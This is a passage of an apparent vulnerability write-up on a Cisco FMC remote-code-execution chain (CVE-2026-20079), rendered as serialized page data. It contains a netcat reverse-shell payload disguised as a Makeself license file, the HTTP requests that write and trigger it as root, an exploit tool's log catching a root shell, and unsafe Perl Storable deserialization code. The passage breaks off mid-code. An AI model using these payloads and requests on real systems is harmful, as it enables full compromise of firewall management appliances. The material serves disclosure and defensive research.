\"installable\" package types provided by Cisco.",[18,8693,8694,8695,8698,8699,8702],{},"The update types can be checked in ",[886,8696,8697],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUpdate.pm"," with the ",[886,8700,8701],{},"GetUpdateFileType"," that checks the first 1024 bytes and assigns a type to the \"install\" file:",[22,8704,8705,8711,8717,8723,8729,8739,8748,8757,8763],{},[25,8706,8707,8710],{},[886,8708,8709],{},"EMPTY"," - empty",[25,8712,8713,8716],{},[886,8714,8715],{},"GPG"," - GPG-signed install package",[25,8718,8719,8722],{},[886,8720,8721],{},"RPM"," - and RPM package",[25,8724,8725,8728],{},[886,8726,8727],{},"TARBALL_XZ"," - an XZ-compressed tarball file",[25,8730,8731,8734,8735,8738],{},[886,8732,8733],{},"BUNDLE"," - a custom Cisco install format that contains a ",[886,8736,8737],{},"bundle.tar"," file",[25,8740,8741,8744,8745],{},[886,8742,8743],{},"SCRIPT"," - A shell script that contains ",[886,8746,8747],{},"#!\u002Fbin\u002Fsh",[25,8749,8750,8753,8754],{},[886,8751,8752],{},"MAKESELF"," - A shell script that also contains the hardcoded string ",[886,8755,8756],{},"# This script was generated using Makeself",[25,8758,8759,8762],{},[886,8760,8761],{},"STUB"," - a split stub JSON file",[25,8764,8765,8768],{},[886,8766,8767],{},"UNKNOWN"," - Anything else",[18,8770,2245,8771,8774,8775,8778,8779,8781,8782,8784,8785,8787,8788,8791,8792,8795,8796,8799,8800,8803,8804,8807,8808,8811,8812,8815,8816,8818,8819,8822,8823,8826,8827,8829],{},[886,8772,8773],{},"upgradeReadinessCall"," will only reach the ",[886,8776,8777],{},"Install"," logic under a subset of these types, and the trivial ",[886,8780,8743],{}," will not work for basic execution. Luckily, ",[886,8783,8752],{}," is also just a shell script with a slightly different format and a hardcoded string. The ",[886,8786,8773],{}," will validate a few UUID parameters and the filetype before passing it to ",[886,8789,8790],{},"SF::Update::readinessInstall"," that calls ",[886,8793,8794],{},"SF::Update::GetUpdateFileInfo",", runs a ",[1131,8797,8798],{},"large"," set of checks, and then triggers ",[886,8801,8802],{},"SF::Update::Install"," on the file. That in turn calls ",[886,8805,8806],{},"SF::Update::Install::_aqInstallTask"," that does disk space checks, validates signatures, performs a few more checks, and then queues the task into ",[886,8809,8810],{},"SF::System::Privileged::InstallUpdate"," with the filename. This package ",[1131,8813,8814],{},"finally"," calls ",[886,8817,4505],{},", which ironically checks whether the caller was run from ",[886,8820,8821],{},"SF::System"," — and if so, it marks the first command argument to be ",[886,8824,8825],{},"\u002Fusr\u002Fbin\u002Fsudo"," and runs the following ",[886,8828,1380],{}," indicating code execution can be achieved:",[1354,8831,8833],{"className":4621,"code":8832,"language":4623,"meta":219,"style":219},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n# chance of someone inputting commands\nopen(SFNULL, \"\u002Fdev\u002Fnull\");\n\nwarn Dumper($dumpcmd) if $DEBUG;\n\n# Traps exceptions for the open call.\neval\n{\n $pid = open3(*SFNULL, *OUTH, *ERRH, @$cmd);\n};\n\n",[886,8834,8835,8840,8845,8862,8866,8886,8890,8895,8900,8905,8917],{"__ignoreMap":219},[1373,8836,8837],{"class":1375,"line":1376},[1373,8838,8839],{"class":4630},"# Open SFNULL to \u002Fdev\u002Fnull so there is less\n",[1373,8841,8842],{"class":1375,"line":220},[1373,8843,8844],{"class":4630},"# chance of someone inputting commands\n",[1373,8846,8847,8850,8853,8855,8858,8860],{"class":1375,"line":1266},[1373,8848,8849],{"class":1379},"open",[1373,8851,8852],{"class":4640},"(SFNULL, ",[1373,8854,183],{"class":1387},[1373,8856,8857],{"class":1391},"\u002Fdev\u002Fnull",[1373,8859,183],{"class":1387},[1373,8861,4680],{"class":4640},[1373,8863,8864],{"class":1375,"line":1852},[1373,8865,6520],{"emptyLinePlaceholder":237},[1373,8867,8868,8871,8874,8876,8879,8881,8883],{"class":1375,"line":4692},[1373,8869,8870],{"class":1379},"warn",[1373,8872,8873],{"class":4640}," Dumper(",[1373,8875,4644],{"class":1383},[1373,8877,8878],{"class":4640},"dumpcmd) ",[1373,8880,4637],{"class":4636},[1373,8882,4656],{"class":1383},[1373,8884,8885],{"class":4640},"DEBUG;\n",[1373,8887,8888],{"class":1375,"line":4724},[1373,8889,6520],{"emptyLinePlaceholder":237},[1373,8891,8892],{"class":1375,"line":4756},[1373,8893,8894],{"class":4630},"# Traps exceptions for the open call.\n",[1373,8896,8897],{"class":1375,"line":4768},[1373,8898,8899],{"class":4636},"eval\n",[1373,8901,8902],{"class":1375,"line":4792},[1373,8903,8904],{"class":4640},"{\n",[1373,8906,8907,8909,8912,8914],{"class":1375,"line":4798},[1373,8908,7362],{"class":1383},[1373,8910,8911],{"class":4640},"pid = open3(*SFNULL, *OUTH, *ERRH, ",[1373,8913,7318],{"class":1383},[1373,8915,8916],{"class":4640},"$cmd);\n",[1373,8918,8919],{"class":1375,"line":4806},[1373,8920,8921],{"class":4640},"};\n",[18,8923,8924],{},"The full process of this path execution from the file write is as follows:",[18,8926,8927,8928,8930,8931,8934,8935,8937,8938,8940,8941,8944],{},"The file write to ",[886,8929,6921],{}," is called with the ",[886,8932,8933],{},"callServerFunc"," URL parameter and an arbitrary Unix timestamp; then the body content is the JSON array containing an ordered array of parameters. In our case, we call the ",[886,8936,8634],{}," function and place our payload in a ",[886,8939,8752],{}," validating script that uses the JSON Unicode-escaped format for any newline characters (normal ",[886,8942,8943],{},"\\n"," will not validate, and arbitrary binary data can actually be written to the file with this technique):",[1354,8946,8948],{"className":6275,"code":8947,"language":6277,"meta":219,"style":219},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 216\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nOrigin: https:\u002F\u002F10.0.0.226\nReferer: https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\nConnection: keep-alive\n\n\n[\n\"2c33d78906e48adf429099629b0e1acf\",\n\"validateLicense\",\n\"#!\u002Fbin\u002Fsh\\u000A# This script was generated using Makeself\\u000A\\u000Arm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\u000A\"]\n",[886,8949,8950,8963,8971,8979,8988,8996,9004,9012,9020,9030,9038,9042,9046,9051,9063,9073],{"__ignoreMap":219},[1373,8951,8952,8954,8957,8959,8961],{"class":1375,"line":1376},[1373,8953,6946],{"class":4636},[1373,8955,8956],{"class":4640}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772817208099 ",[1373,8958,6290],{"class":5387},[1373,8960,2180],{"class":4640},[1373,8962,6295],{"class":5467},[1373,8964,8965,8967,8969],{"class":1375,"line":220},[1373,8966,6301],{"class":6300},[1373,8968,4606],{"class":5387},[1373,8970,6306],{"class":1391},[1373,8972,8973,8975,8977],{"class":1375,"line":1266},[1373,8974,6565],{"class":6300},[1373,8976,4606],{"class":5387},[1373,8978,6570],{"class":1391},[1373,8980,8981,8983,8985],{"class":1375,"line":1852},[1373,8982,6411],{"class":6300},[1373,8984,4606],{"class":5387},[1373,8986,8987],{"class":1391}," 216\n",[1373,8989,8990,8992,8994],{"class":1375,"line":4692},[1373,8991,6391],{"class":6300},[1373,8993,4606],{"class":5387},[1373,8995,7000],{"class":1391},[1373,8997,8998,9000,9002],{"class":1375,"line":4724},[1373,8999,6311],{"class":6300},[1373,9001,4606],{"class":5387},[1373,9003,6316],{"class":1391},[1373,9005,9006,9008,9010],{"class":1375,"line":4756},[1373,9007,7013],{"class":6300},[1373,9009,4606],{"class":5387},[1373,9011,7018],{"class":1391},[1373,9013,9014,9016,9018],{"class":1375,"line":4768},[1373,9015,7820],{"class":6300},[1373,9017,4606],{"class":5387},[1373,9019,7825],{"class":1391},[1373,9021,9022,9025,9027],{"class":1375,"line":4792},[1373,9023,9024],{"class":6300},"Referer",[1373,9026,4606],{"class":5387},[1373,9028,9029],{"class":1391}," https:\u002F\u002F10.0.0.226\u002Fplatinum\u002FIDSRuleList.cgi\n",[1373,9031,9032,9034,9036],{"class":1375,"line":4798},[1373,9033,6331],{"class":6300},[1373,9035,4606],{"class":5387},[1373,9037,6336],{"class":1391},[1373,9039,9040],{"class":1375,"line":4806},[1373,9041,6520],{"emptyLinePlaceholder":237},[1373,9043,9044],{"class":1375,"line":4817},[1373,9045,6520],{"emptyLinePlaceholder":237},[1373,9047,9048],{"class":1375,"line":4825},[1373,9049,9050],{"class":1383},"[\n",[1373,9052,9053,9055,9058,9060],{"class":1375,"line":4835},[1373,9054,183],{"class":1387},[1373,9056,9057],{"class":1391},"2c33d78906e48adf429099629b0e1acf",[1373,9059,183],{"class":1387},[1373,9061,9062],{"class":1383},",\n",[1373,9064,9065,9067,9069,9071],{"class":1375,"line":4843},[1373,9066,183],{"class":1387},[1373,9068,8634],{"class":1391},[1373,9070,183],{"class":1387},[1373,9072,9062],{"class":1383},[1373,9074,9075,9077,9079,9082,9084,9087,9090,9092,9094],{"class":1375,"line":4849},[1373,9076,183],{"class":1387},[1373,9078,8747],{"class":1391},[1373,9080,9081],{"class":2326},"\\u000A",[1373,9083,8756],{"class":1391},[1373,9085,9086],{"class":2326},"\\u000A\\u000A",[1373,9088,9089],{"class":1391},"rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff",[1373,9091,9081],{"class":2326},[1373,9093,183],{"class":1387},[1373,9095,7103],{"class":1383},[18,9097,9098],{},"The server will respond with an error saying that the license is invalid:",[1354,9100,9102],{"className":6275,"code":9101,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 200 OK\nServer: Mojolicious (Perl)\nContent-Type: application\u002Fjson\nContent-Length: 219\n\n{\"data\":{\"lic\":\"#!\u002Fbin\u002Fsh\\n# This script was generated using Makeself\\n\\nrm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\n\",\"statusmsg\":\"License is Invalid.\\n\",\"status\":0,\"isBaseLicense\":0}}\n",[886,9103,9104,9116,9124,9132,9141,9145],{"__ignoreMap":219},[1373,9105,9106,9108,9110,9112,9114],{"class":1375,"line":1376},[1373,9107,6290],{"class":5387},[1373,9109,2180],{"class":4640},[1373,9111,6350],{"class":5467},[1373,9113,6610],{"class":5467},[1373,9115,6613],{"class":1391},[1373,9117,9118,9120,9122],{"class":1375,"line":220},[1373,9119,6371],{"class":6300},[1373,9121,4606],{"class":5387},[1373,9123,6376],{"class":1391},[1373,9125,9126,9128,9130],{"class":1375,"line":1266},[1373,9127,6391],{"class":6300},[1373,9129,4606],{"class":5387},[1373,9131,7000],{"class":1391},[1373,9133,9134,9136,9138],{"class":1375,"line":1852},[1373,9135,6411],{"class":6300},[1373,9137,4606],{"class":5387},[1373,9139,9140],{"class":1391}," 219\n",[1373,9142,9143],{"class":1375,"line":4692},[1373,9144,6520],{"emptyLinePlaceholder":237},[1373,9146,9147,9150,9153,9157,9159,9161,9163,9167,9169,9171,9174,9177,9179,9181,9184,9186,9188,9190,9192,9194,9197,9199,9201,9203,9206,9208,9210,9212,9214,9217,9219,9221,9223,9225,9227,9230,9232,9234,9236],{"class":1375,"line":4724},[1373,9148,9149],{"class":1383},"{",[1373,9151,183],{"class":9152},"saDeg",[1373,9154,9156],{"class":9155},"sEff5","data",[1373,9158,183],{"class":9152},[1373,9160,8304],{"class":1383},[1373,9162,183],{"class":9152},[1373,9164,9166],{"class":9165},"s_MOj","lic",[1373,9168,183],{"class":9152},[1373,9170,4606],{"class":1383},[1373,9172,183],{"class":9173},"sh1VR",[1373,9175,8747],{"class":9176},"sINAO",[1373,9178,8943],{"class":2326},[1373,9180,8756],{"class":9176},[1373,9182,9183],{"class":2326},"\\n\\n",[1373,9185,9089],{"class":9176},[1373,9187,8943],{"class":2326},[1373,9189,183],{"class":9173},[1373,9191,5437],{"class":1383},[1373,9193,183],{"class":9152},[1373,9195,9196],{"class":9165},"statusmsg",[1373,9198,183],{"class":9152},[1373,9200,4606],{"class":1383},[1373,9202,183],{"class":9173},[1373,9204,9205],{"class":9176},"License is Invalid.",[1373,9207,8943],{"class":2326},[1373,9209,183],{"class":9173},[1373,9211,5437],{"class":1383},[1373,9213,183],{"class":9152},[1373,9215,9216],{"class":9165},"status",[1373,9218,183],{"class":9152},[1373,9220,4606],{"class":1383},[1373,9222,445],{"class":5467},[1373,9224,5437],{"class":1383},[1373,9226,183],{"class":9152},[1373,9228,9229],{"class":9165},"isBaseLicense",[1373,9231,183],{"class":9152},[1373,9233,4606],{"class":1383},[1373,9235,445],{"class":5467},[1373,9237,9238],{"class":1383},"}}\n",[18,9240,9241,9242,9244,9245,9247],{},"But on the disk, the file will be deserialized from JSON and written to ",[886,9243,4484],{}," with the fully formed shell script. Finally, the ",[886,9246,4491],{}," interface is called. This also takes a set of special arguments:",[22,9249,9250,9261,9270],{},[25,9251,9252,9254,9255,9257,9258,9260],{},[886,9253,8560],{},": the function being called by the server. In our case, this is ",[886,9256,4495],{},", but in the exploit’s case can be any function that has an ",[886,9259,6915],{}," permission mark.",[25,9262,9263,9265,9266,9269],{},[886,9264,7120],{},": a JSON array that contains all the parameters for the function call in the order that they are called by the function. In this case, we are sending ",[886,9267,9268],{},"[\"\u002Fvar\u002Ftmp\u002Flicense.tmp\",[\"42fb13fa-82e0-47a1-b147-3d64c8b9c708\"]]"," which contains the location of install files and a random UUID that is required to select the \"local install\" option of the readiness call (theoretically, if the system has a remote install setup and the sensors’ UUIDs are known, this should also allow execution on remote sensors).",[25,9271,9272,9274],{},[886,9273,4468],{},": contains the retrieved CSRF token",[18,9276,9277],{},"Calling this will finally trigger the remote code execution as root:",[1354,9279,9281],{"className":6275,"code":9280,"language":6277,"meta":219,"style":219},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 224\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\n\nfunction=SF::UI::DataObjectLibrary::upgradeReadinessCall¶meters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[886,9282,9283,9295,9303,9311,9320,9328,9336,9344,9352,9356],{"__ignoreMap":219},[1373,9284,9285,9287,9289,9291,9293],{"class":1375,"line":1376},[1373,9286,6946],{"class":4636},[1373,9288,7137],{"class":4640},[1373,9290,6290],{"class":5387},[1373,9292,2180],{"class":4640},[1373,9294,6295],{"class":5467},[1373,9296,9297,9299,9301],{"class":1375,"line":220},[1373,9298,6301],{"class":6300},[1373,9300,4606],{"class":5387},[1373,9302,6306],{"class":1391},[1373,9304,9305,9307,9309],{"class":1375,"line":1266},[1373,9306,6565],{"class":6300},[1373,9308,4606],{"class":5387},[1373,9310,6570],{"class":1391},[1373,9312,9313,9315,9317],{"class":1375,"line":1852},[1373,9314,6411],{"class":6300},[1373,9316,4606],{"class":5387},[1373,9318,9319],{"class":1391}," 224\n",[1373,9321,9322,9324,9326],{"class":1375,"line":4692},[1373,9323,6986],{"class":6300},[1373,9325,4606],{"class":5387},[1373,9327,6991],{"class":1391},[1373,9329,9330,9332,9334],{"class":1375,"line":4724},[1373,9331,6391],{"class":6300},[1373,9333,4606],{"class":5387},[1373,9335,7185],{"class":1391},[1373,9337,9338,9340,9342],{"class":1375,"line":4756},[1373,9339,6311],{"class":6300},[1373,9341,4606],{"class":5387},[1373,9343,6316],{"class":1391},[1373,9345,9346,9348,9350],{"class":1375,"line":4768},[1373,9347,7013],{"class":6300},[1373,9349,4606],{"class":5387},[1373,9351,7018],{"class":1391},[1373,9353,9354],{"class":1375,"line":4792},[1373,9355,6520],{"emptyLinePlaceholder":237},[1373,9357,9358],{"class":1375,"line":4798},[1373,9359,9360],{"class":4640},"function=SF::UI::DataObjectLibrary::upgradeReadinessCall¶meters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[1354,9362,9366],{"className":9363,"code":9364,"language":9365,"meta":219,"style":219},"language-shellsession shiki shiki-themes material-theme-lighter github-light github-dark monokai","poptart@grimm $ .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \ntime=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\ntime=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\ntime=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\ntime=2026-03-19T19:00:40.702-06:00 level=SUCCESS msg=\"Authentication successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\ntime=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\ntime=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\ntime=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\ntime=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\nsh: cannot set terminal process group (14096): Inappropriate ioctl for device\nsh: no job control in this shell\nsh-5.1# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\nsh-5.1# exit\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for SSL shell server\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n","shellsession",[886,9367,9368,9379,9385,9390,9395,9400,9405,9410,9415,9420,9425,9430,9435,9440,9445,9456,9461,9466,9475,9480,9485],{"__ignoreMap":219},[1373,9369,9370,9374,9376],{"class":1375,"line":1376},[1373,9371,9373],{"class":9372},"sQqfL","poptart@grimm",[1373,9375,4656],{"class":1383},[1373,9377,9378],{"class":4640}," .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \n",[1373,9380,9381],{"class":1375,"line":220},[1373,9382,9384],{"class":9383},"s91G_","time=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\n",[1373,9386,9387],{"class":1375,"line":1266},[1373,9388,9389],{"class":9383},"time=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\n",[1373,9391,9392],{"class":1375,"line":1852},[1373,9393,9394],{"class":9383},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\n",[1373,9396,9397],{"class":1375,"line":4692},[1373,9398,9399],{"class":9383},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\n",[1373,9401,9402],{"class":1375,"line":4724},[1373,9403,9404],{"class":9383},"time=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\n",[1373,9406,9407],{"class":1375,"line":4756},[1373,9408,9409],{"class":9383},"time=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\n",[1373,9411,9412],{"class":1375,"line":4768},[1373,9413,9414],{"class":9383},"time=2026-03-19T19:00:40.702-06:00 level=SUCCESS msg=\"Authentication successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\n",[1373,9416,9417],{"class":1375,"line":4792},[1373,9418,9419],{"class":9383},"time=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\n",[1373,9421,9422],{"class":1375,"line":4798},[1373,9423,9424],{"class":9383},"time=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\n",[1373,9426,9427],{"class":1375,"line":4806},[1373,9428,9429],{"class":9383},"time=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\n",[1373,9431,9432],{"class":1375,"line":4817},[1373,9433,9434],{"class":9383},"time=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\n",[1373,9436,9437],{"class":1375,"line":4825},[1373,9438,9439],{"class":9383},"sh: cannot set terminal process group (14096): Inappropriate ioctl for device\n",[1373,9441,9442],{"class":1375,"line":4835},[1373,9443,9444],{"class":9383},"sh: no job control in this shell\n",[1373,9446,9447,9450,9453],{"class":1375,"line":4843},[1373,9448,9449],{"class":9372},"sh-5.1",[1373,9451,9452],{"class":1383},"#",[1373,9454,9455],{"class":4640}," id\n",[1373,9457,9458],{"class":1375,"line":4849},[1373,9459,9460],{"class":9383},"id\n",[1373,9462,9463],{"class":1375,"line":4877},[1373,9464,9465],{"class":9383},"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\n",[1373,9467,9468,9470,9472],{"class":1375,"line":4915},[1373,9469,9449],{"class":9372},[1373,9471,9452],{"class":1383},[1373,9473,9474],{"class":4640}," exit\n",[1373,9476,9477],{"class":1375,"line":4931},[1373,9478,9479],{"class":9383},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for SSL shell server\"\n",[1373,9481,9482],{"class":1375,"line":4947},[1373,9483,9484],{"class":9383},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\n",[1373,9486,9487],{"class":1375,"line":4952},[1373,9488,9489],{"class":9383},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n",[61,9491,9493],{"id":9492},"a-note-on-perl-storables","A Note on Perl Storables",[18,9495,9496,9497,9502,9503,9506,9507,9509,9510,4606],{},"The FMC system utilizes the Perl ",[47,9498,9501],{"href":9499,"rel":9500},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable",[51],"Storable"," module all over the place and even does C foreign-function calls to load Perl objects in multiple places. During our testing, we identified that the ",[886,9504,9505],{},"sajaxint.cgi"," endpoint allowed a ",[886,9508,6935],{}," call that end up trickling into the following suspicious few lines in ",[886,9511,9512],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm",[1354,9514,9516],{"className":4621,"code":9515,"language":4623,"meta":219,"style":219},"sub DeSerialize\n{\n my $options = shift();\n\n if (!defined($options->{data}) && !defined($options->{filename}) && !defined($options->{fd}))\n {\n return undef;\n }\n\n my $deserialized_data;\ntry\n{\n local $Storable::Eval = $Storable::Eval = 1;\n\n if (defined($options->{fd}))\n {\n $deserialized_data = Storable::fd_retrieve($options->{fd});\n }\n elsif (defined($options->{filename}))\n {\n my $fn = SF::Reloc::RelocateFilename($options->{filename});\n\n if(-e $fn)\n {\n if ($options->{lock})\n {\n $deserialized_data = Storable::lock_retrieve($fn);\n }\n else\n {\n $deserialized_data = Storable::retrieve($fn);\n }\n }\n else\n {\n warn \"Unable to locate file for retrieval: $options->{filename}\";\n return undef;\n }\n }\n elsif ($options->{data})\n {\n $deserialized_data = Storable::thaw($options->{data});\n }\n}\n",[886,9517,9518,9525,9529,9545,9549,9609,9614,9622,9626,9630,9639,9644,9648,9663,9667,9689,9693,9713,9717,9740,9744,9765,9769,9784,9789,9810,9815,9828,9833,9838,9842,9853,9857,9862,9867,9871,9892,9901,9906,9911,9930,9935,9955,9960],{"__ignoreMap":219},[1373,9519,9520,9522],{"class":1375,"line":1376},[1373,9521,7294],{"class":7293},[1373,9523,9524],{"class":7297}," DeSerialize\n",[1373,9526,9527],{"class":1375,"line":220},[1373,9528,8904],{"class":4640},[1373,9530,9531,9533,9535,9538,9541,9543],{"class":1375,"line":1266},[1373,9532,4653],{"class":4652},[1373,9534,4656],{"class":1383},[1373,9536,9537],{"class":4640},"options = ",[1373,9539,9540],{"class":1379},"shift",[1373,9542,7514],{"class":1383},[1373,9544,4912],{"class":4640},[1373,9546,9547],{"class":1375,"line":1852},[1373,9548,6520],{"emptyLinePlaceholder":237},[1373,9550,9551,9553,9556,9558,9560,9562,9565,9567,9569,9571,9574,9576,9578,9580,9582,9584,9586,9589,9591,9593,9595,9597,9599,9601,9603,9606],{"class":1375,"line":4692},[1373,9552,4695],{"class":4636},[1373,9554,9555],{"class":4640}," (!",[1373,9557,7350],{"class":1379},[1373,9559,1384],{"class":4640},[1373,9561,4644],{"class":1383},[1373,9563,9564],{"class":4640},"options",[1373,9566,4667],{"class":1397},[1373,9568,9149],{"class":4640},[1373,9570,9156],{"class":2326},[1373,9572,9573],{"class":4640},"}) && !",[1373,9575,7350],{"class":1379},[1373,9577,1384],{"class":4640},[1373,9579,4644],{"class":1383},[1373,9581,9564],{"class":4640},[1373,9583,4667],{"class":1397},[1373,9585,9149],{"class":4640},[1373,9587,9588],{"class":2326},"filename",[1373,9590,9573],{"class":4640},[1373,9592,7350],{"class":1379},[1373,9594,1384],{"class":4640},[1373,9596,4644],{"class":1383},[1373,9598,9564],{"class":4640},[1373,9600,4667],{"class":1397},[1373,9602,9149],{"class":4640},[1373,9604,9605],{"class":2326},"fd",[1373,9607,9608],{"class":4640},"}))\n",[1373,9610,9611],{"class":1375,"line":4724},[1373,9612,9613],{"class":4640}," {\n",[1373,9615,9616,9618,9620],{"class":1375,"line":4756},[1373,9617,4918],{"class":4636},[1373,9619,7480],{"class":1379},[1373,9621,4912],{"class":4640},[1373,9623,9624],{"class":1375,"line":4768},[1373,9625,4795],{"class":4640},[1373,9627,9628],{"class":1375,"line":4792},[1373,9629,6520],{"emptyLinePlaceholder":237},[1373,9631,9632,9634,9636],{"class":1375,"line":4798},[1373,9633,4653],{"class":4652},[1373,9635,4656],{"class":1383},[1373,9637,9638],{"class":4640},"deserialized_data;\n",[1373,9640,9641],{"class":1375,"line":4806},[1373,9642,9643],{"class":4640},"try\n",[1373,9645,9646],{"class":1375,"line":4817},[1373,9647,8904],{"class":4640},[1373,9649,9650,9653,9655,9658,9660],{"class":1375,"line":4825},[1373,9651,9652],{"class":4652}," local",[1373,9654,4656],{"class":1383},[1373,9656,9657],{"class":4640},"Storable::Eval = ",[1373,9659,4644],{"class":1383},[1373,9661,9662],{"class":4640},"Storable::Eval = 1;\n",[1373,9664,9665],{"class":1375,"line":4835},[1373,9666,6520],{"emptyLinePlaceholder":237},[1373,9668,9669,9671,9673,9675,9677,9679,9681,9683,9685,9687],{"class":1375,"line":4843},[1373,9670,4695],{"class":4636},[1373,9672,4641],{"class":4640},[1373,9674,7350],{"class":1379},[1373,9676,1384],{"class":4640},[1373,9678,4644],{"class":1383},[1373,9680,9564],{"class":4640},[1373,9682,4667],{"class":1397},[1373,9684,9149],{"class":4640},[1373,9686,9605],{"class":2326},[1373,9688,9608],{"class":4640},[1373,9690,9691],{"class":1375,"line":4849},[1373,9692,9613],{"class":4640},[1373,9694,9695,9697,9700,9702,9704,9706,9708,9710],{"class":1375,"line":4877},[1373,9696,4727],{"class":1383},[1373,9698,9699],{"class":4640},"deserialized_data = Storable::fd_retrieve(",[1373,9701,4644],{"class":1383},[1373,9703,9564],{"class":4640},[1373,9705,4667],{"class":1397},[1373,9707,9149],{"class":4640},[1373,9709,9605],{"class":2326},[1373,9711,9712],{"class":4640},"});\n",[1373,9714,9715],{"class":1375,"line":4915},[1373,9716,4795],{"class":4640},[1373,9718,9719,9722,9724,9726,9728,9730,9732,9734,9736,9738],{"class":1375,"line":4931},[1373,9720,9721],{"class":4636}," 